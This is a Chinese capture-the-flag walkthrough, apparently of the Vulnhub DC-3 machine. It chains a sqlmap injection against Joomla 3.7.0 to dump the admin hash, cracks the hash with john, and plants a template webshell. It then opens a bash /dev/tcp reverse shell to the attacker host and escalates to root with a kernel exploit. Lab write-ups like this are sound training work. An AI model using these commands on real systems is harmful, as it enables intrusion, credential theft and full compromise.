信息搜集
探测局域网内存活主机
nmap -sP 192.168.19.128/24
得到192.168.19.130,然后扫描探测开放的端口
nmap -p- 192.168.19.130
发现只有80端口开放,我们在浏览器中访问
渗透
按照上面的提示我们需要进行登录,提权等一系列操作.
先用whatweb进行一下扫描
whatweb -v 192.168.19.130
发现使用的是3.7.0版本的joomla框架.joomla是一种开源的cms框架.我们可以通过kali下的joomscan自动化工具进行版本和漏洞枚举.
joomscan -u 192.168.19.130
扫描得知admin finder(管理登录页面)为http://192.168.19.130/administrator/
我们可以使用searchsploit来进行漏洞搜索
searchsploit joomla 3.7.0
我们可以看到该版本存在两个漏洞,我们选择该版本特有的去打
searchsploit -p 42033
查看该exp对应的路径
然后直接查看该exp文件,发现给出了这个漏洞的sqlmap利用方法
我们把这个localhost换成靶机的ip进行扫描
sqlmap -u "http://192.168.19.130//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
得到如下数据库
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
我们想要的是joomladb中的内容,因此我们爆破joomladb下的表
sqlmap -u "http://192.168.19.130//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables
得到了七十多个表,感觉其中的#__users表会有说法,我们爆一下其中的列
sqlmap -u "http://192.168.19.130//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" --columns
对username和password进行查看
sqlmap -u "http://192.168.19.130//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" -C "username,password" --dump
得到了账号和密码
username=admin,password=$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
我们不难猜出这个password是经过某种hash加密的结果.这里我们可以使用john来进行模糊哈希破解
echo '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu' > password
john password
得到了密码为snoopy
此时我们就能从之前得到的http://192.168.19.130/administrator/进行admin登录
接下来我们需要反弹一个shell.
在Extensions->Templates->Templates中创建文件,写一个文件马
然后我们使用蚁剑进行连接http://192.168.19.130/templates/beez3/webshell.php.注意:其中的templates/beez3这个路径是由joomla得到的,由于我们把马写到了根目录,因此连接路径如上.
提权
查看服务器的版本信息
cat /etc/issue
我们使用searchexploit去寻找该版本ubuntu存在的漏洞
发现其中的39772是有关previlege escalation的,我们选择这个打.
我们查看这个39772号文件,发现给出了漏洞利用方法和相应的文件以及使用方法
我们将39772.zip通过蚁剑传到tmp下(确保一定有写文件权限),然后执行如下命令
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
发现多了个doubleput文件,但是尝试执行却并没有成功获得权限.这里不知道为什么
将shell反弹到kali下,在kali监听端口
nc -lvp 2333
然后在蚁剑中去反弹shell
bash -c 'bash -i >& /dev/tcp/192.168.19.128/2333 0>&1'
这里解释一下这个反弹shell的命令:
bash -c是将后面的字符串当做bash命令执行.
bash -i启动一个交互式的shell,>&表示将标准输出和标准错误进行重定向.
/dev/tcp/192.168.19.128/2333是一个特殊的文件路径,反映了linux可以通过文件路径进行网络连接的特点.
0>&1表示将标准输入重定向到和标准输出相同的地方.
然后我们回到kali下,发现可以进行交互,运行
./doubleput
成功提权,回到root home即可查看flag.
存在一个疑问点,就是为什么在蚁剑下不能进行提权,但是反弹shell后反而可以
标签:19.130,fullordering,--,fields,list,DC,192.168,vulnhub From: https://www.cnblogs.com/merak-lbz/p/18319806